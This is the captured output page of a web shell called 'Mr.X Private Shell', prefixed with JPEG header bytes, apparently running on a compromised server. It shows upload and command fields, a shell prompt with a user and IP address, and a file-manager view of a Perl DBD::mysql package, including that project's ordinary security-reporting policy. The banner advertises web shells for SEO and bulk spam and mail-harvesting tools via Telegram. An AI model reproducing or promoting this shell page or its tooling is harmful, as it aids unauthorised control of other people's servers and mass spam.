����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
This is the Security Policy for the Perl DBD::mysql distribution.

Report security issues via email to Daniël van Eeden <pause@myname.nl>
or via the
[private security issue reporting feature in GitHub](https://github.com/perl5-dbi/DBD-mysql/security/advisories/new).

The latest version of the Security Policy can be found in the
[git repository for DBD::mysql](https://github.com/perl5-dbi/DBD-mysql).

This text is based on the CPAN Security Group's Guidelines for Adding
a Security Policy to Perl Distributions (version 1.4.1)
https://security.metacpan.org/docs/guides/security-policy-for-authors.html

# How to Report a Security Vulnerability

Security vulnerabilities can be reported by e-mail to Daniël van Eeden
at <pause@myname.nl>.

Please include as many details as possible, including code samples
or test cases, so that we can reproduce the issue.  Check that your
report does not expose any sensitive data, such as passwords,
tokens, or personal information.

Project maintainers will normally credit the reporter when a
vulnerability is disclosed or fixed.  If you do not want to be
credited publicly, please indicate that in your report.

If you would like any help with triaging the issue, or if the issue
is being actively exploited, please copy the report to the CPAN
Security Group (CPANSec) at <cpan-security@security.metacpan.org>.

Please *do not* use the public issue reporting system on RT or
GitHub issues for reporting security vulnerabilities.

Please do not disclose the security vulnerability in public forums
until past any proposed date for public disclosure, or it has been
made public by the maintainers or CPANSec.  That includes patches or
pull requests or mitigation advice.

For more information, see
[Report a Security Issue](https://security.metacpan.org/docs/report.html)
on the CPANSec website.

## Response to Reports

The maintainer(s) aim to acknowledge your security report as soon as
possible.  However, this project is maintained by a single volunteer in
their spare time, and they cannot guarantee a rapid response.  If you
have not received a response from them within a week, then
please send a reminder to them and copy the report to CPANSec at
<cpan-security@security.metacpan.org>.

Please note that the initial response to your report will be an
acknowledgement, with a possible query for more information.  It
will not necessarily include any fixes for the issue.

The project maintainer(s) may forward this issue to the security
contacts for other projects where we believe it is relevant.  This
may include embedded libraries, system libraries, prerequisite
modules or downstream software that uses this software.

They may also forward this issue to CPANSec.

# Which Software This Policy Applies To

Any security vulnerabilities in DBD::mysql are covered by this policy.

Security vulnerabilities in versions of any libraries that are
included in DBD::mysql are also covered by this policy.

Security vulnerabilities are considered anything that allows users
to execute unauthorised code, access unauthorised resources, or to
have an adverse impact on accessibility or performance of a system.

Security vulnerabilities in upstream software (prerequisite modules
or system libraries, or in Perl), are not covered by this policy
unless they affect DBD::mysql, or DBD::mysql can be used to exploit
vulnerabilities in them.

Security vulnerabilities in downstream software (any software that
uses DBD::mysql, or plugins to it that are not included with the
DBD::mysql distribution) are not covered by this policy.

## Supported Versions of DBD::mysql

The maintainer(s) will release security fixes for the latest version
of DBD::mysql and the v4 branch.

Note that the DBD::mysql project only supports major versions of Perl
released in the past ten (10) years, even though DBD::mysql will run on
older versions of Perl.  If a security fix requires the maintainers to
increase the minimum version of Perl that is supported, then they may
do so.

# Installation and Usage Issues

The distribution metadata specifies minimum versions of
prerequisites that are required for DBD::mysql to work.  However, some
of these prerequisites may have security vulnerabilities, and you
should ensure that you are using up-to-date versions of these
prerequisites.

Where security vulnerabilities are known, the metadata may indicate
newer versions as recommended.

## Usage

Please see the software documentation for further information.

Filemanager

Name Type Size Permission Actions
blib Folder 0755
lib Folder 0755
t Folder 0755
Changes File 89.22 KB 0644
LICENSE File 17.94 KB 0644
MANIFEST File 1.86 KB 0644
MANIFEST.SKIP File 210 B 0644
META.json File 4.6 KB 0644
META.yml File 3.47 KB 0644
MYMETA.json File 4.6 KB 0644
MYMETA.yml File 3.47 KB 0644
Makefile File 53.66 KB 0644
Makefile.PL File 21.27 KB 0644
README.md File 1.04 KB 0644
SECURITY.md File 4.38 KB 0644
constants.h File 1.9 KB 0644
dbdimp.c File 140.55 KB 0644
dbdimp.h File 8.84 KB 0644
myld File 1.68 KB 0644
mysql.bs File 0 B 0644
mysql.xs File 16.89 KB 0644
pm_to_blib File 0 B 0644
socket.c File 923 B 0644